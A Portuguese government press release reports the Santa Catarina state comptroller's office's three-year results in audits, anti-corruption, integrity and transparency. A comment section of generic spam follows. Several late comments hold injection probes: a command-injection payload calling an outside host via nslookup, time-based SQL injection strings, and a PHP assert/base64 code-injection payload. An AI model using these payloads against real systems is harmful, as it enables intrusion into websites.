CGE

CGE-SC completa 3 anos e contabiliza benefícios de mais de R$ 350 milhões ao Estado

A Controladoria-Geral do Estado de Santa Catarina contabiliza mais de R$ 350 milhões em benefícios financeiros aos cofres do Estado em três anos de existência do órgão. O valor corresponde aos recursos que deixaram de ser pagos ou foram reembolsados só com as recomendações feitas pela auditoria interna aos órgãos e entidades. Outros R$ 50 milhões devem entrar no caixa do governo nas próximas semanas decorrentes do acordo de leniência firmado pela CGE no início deste ano.  

A CGE foi criada pelo governador Moisés na reforma administrativa de 2019. O órgão reuniu de forma inédita no Estado as atividades de Auditoria, Ouvidoria, Transparência e Corregedoria. Neste ano, a Controladoria também incorporou a área de Integridade e Compliance, fechando o que especialistas chamam de ciclo do controle: prevenção, monitoramento, detecção, investigação e correção. 

Para o controlador-geral do Estado, Cristiano Socas da Silva, novas perspectivas se abrem para a CGE com o anúncio de concurso para 95 auditores feito recentemente pelo governador. Hoje, a Controladoria tem 85 servidores atuando nas diversas frentes de trabalho do órgão, dos quais 50 são auditores. “Há gerências com apenas um servidor. A valorização da CGE é fundamental para intensificar o controle dos gastos públicos, a promoção do controle social e o combate à corrupção”, afirma Socas. 

Combate à corrupção – Para Socas, a criação da CGE possibilitou, entre outros avanços, tirar do papel a Lei Anticorrupção, aprovada pelo Congresso Nacional em 2017. Com base nesta lei, o Estado assinou em fevereiro passado seu primeiro acordo de leniência com a Neoway, empresa de tecnologia investigada por corrupção no âmbito da operação Hemorragia. Além de contribuir com as investigações, a empresa concordou em pagar multa de R$ 50,6 milhões ao Estado. 

Com a CGE, o Governo também começou a fazer processos administrativos de responsabilização de empresas envolvidas em fraudes, chamados de PAR. “Hoje, temos 22 processos abertos, 16 no âmbito da CGE”, ressalta o controlador-geral. Em dezembro de 2021, a Corregedoria-Geral, área vinculada à Controladoria, concluiu o primeiro PAR do Governo do Estado de Santa Catarina. Uma empresa foi multada em R$ 852,1 mil por fraudar um contrato de reforma de uma escola. 

Ainda na área de combate à corrupção, a Controladoria passou a exigir de todos os servidores públicos a entrega anual da declaração de bens e valores. O objetivo é permitir o acompanhamento da evolução patrimonial e detectar possíveis incompatibilidades com a remuneração. A obrigatoriedade da entrega da declaração está prevista na Lei de Improbidade Administrativa, que dispõe sobre as sanções aplicáveis aos agentes públicos nos casos de enriquecimento ilícito. 

Integridade – No início de 2022, a CGE incorporou a área de Integridade e Compliance, reforçando o trabalho de prevenção à irregularidades e fraudes. O Programa de Integridade & Compliance já conta com a adesão voluntária de quase 100% dos órgãos e entidades do Estado. A partir dele, as organizações se comprometem a construir planos de integridade, instrumentos que reúnem procedimentos e condutas internas para prevenir a ocorrência de atos lesivos aos interesses públicos.

A Controladoria também vem investindo forte em tecnologia e inovação. Em três anos, criou sistemas para monitorar a implantação das recomendações de Auditoria nos órgãos e entidades, cruzou dados de diferentes bases para evitar e revelar fraudes, criou um robô para coletar grandes volumes de dados e apoiar o trabalho das auditorias internas e disponibilizou painéis de inteligência para ampliar o controle dos gastos públicos tanto na própria CGE quanto nos demais órgãos do Executivo. 

Controle social – Na área de Ouvidoria e Transparência, a Controladoria criou o Portal de Dados Abertos, instrumento cada vez mais importante de promoção da transparência e do controle social. Recentemente, o órgão também anunciou a publicação do novo decreto de Ouvidoria que, entre outros avanços, regulamentou uma série de mecanismos de proteção ao denunciante. O objetivo é impedir retaliações a quem usar o canal da Ouvidoria-Geral para fazer denúncias de ilícitos ou irregularidades contra a administração pública estadual.  

Com a criação da CGE, Santa Catarina também passou a contar com uma gerência específica de promoção do controle social. Por meio dela, o Estado aderiu à Open Government Partnership OGP), organização internacional que promove governos mais participativos e transparentes. No ano passado, Santa Catarina lançou o 1º Plano SC Governo Aberto, assumindo quatro compromissos que promovem a participação da sociedade na administração pública estadual.

 

Informações:

Cléia Schmitz

Assessoria de Imprensa

Controladoria-Geral do Estado

E-mail: cschmitz@www.cge.sc.gov.br/

Fone: (48) 99128-1980

24 COMENTÁRIOS

comments user
Alfonso

I simply couldn’t go away your website before suggesting that I extremely loved the usual
info a person provide in your visitors? Is going to be again regularly to investigate cross-check new posts

comments user
Norbert

Link exchange is nothing else however it is only placing the other
person’s web site link on your page at proper place and other person will also do
similar for you.

comments user
Taneisha

I have read so many articles concerning the blogger
lovers but this paragraph is in fact a nice post, keep it
up.

comments user
Alvis

Excellent blog here! Also your site loads up fast! What host
are you using? Can I get your affiliate link to your host?
I wish my website loaded up as fast as yours lol

comments user
Talley

Hi! Do you use Twitter? I’d like to follow you if that would be okay.
I’m definitely enjoying your blog and look forward to
new posts.

comments user
Inge

Wow, wonderful blog layout! How long have you been running a blog for?
you make running a blog look easy. The entire glance of your site is wonderful, as
neatly as the content!

comments user
Chrissa

Hello! Quick question that’s entirely off topic. Do you know how to make your site mobile friendly?
My website looks weird when browsing from my iphone 4.
I’m trying to find a template or plugin that might be able to resolve this issue.

If you have any suggestions, please share. Cheers!

comments user
Bassem

Ahaa, its nice dialogue about this piece of writing at this place at this blog, I
have read all that, so at this time me also commenting here.

comments user
Janeika

I could not refrain from commenting. Perfectly written!

comments user
Juliet

Hello there, just became aware of your blog through
Google, and found that it is really informative. I’m gonna watch out for brussels.
I’ll appreciate if you continue this in future. Many people will be benefited from your writing.
Cheers!

comments user
Meriam

It’s genuinely very complex in this busy life to listen news on TV, so I only use world
wide web for that purpose, and obtain the newest information.

comments user
Almeda

You are so cool! I do not suppose I’ve truly read something like that before.

So good to find another person with genuine thoughts on this
issue. Really.. thank you for starting this up. This web site is one thing that’s
needed on the web, someone with some originality!

comments user
Jad

This is a very good tip particularly to those new to the blogosphere.
Brief but very precise info… Many thanks for sharing this one.
A must read post!

comments user
Ladora

My family members all the time say that I am wasting my time here at web, except I know I
am getting knowledge every day by reading such fastidious articles or reviews.

comments user
OqFawFBD

555

comments user
4WYG08p0

555

comments user
Anônimo

555

comments user
OqFawFBD

$(nslookup hitvkrfrtbwrs8eca9.bxss.me||perl -e “gethostbyname(‘hitvkrfrtbwrs8eca9.bxss.me’)”)

comments user
OqFawFBD

if(now()=sysdate(),sleep(15),0)

comments user
OqFawFBD

1 waitfor delay ‘0:0:15’ —

comments user
OqFawFBD

;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));

comments user
OqFawFBD

wp-comments-post.php

comments user
OqFawFBD

555

comments user
OqFawFBD

555

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *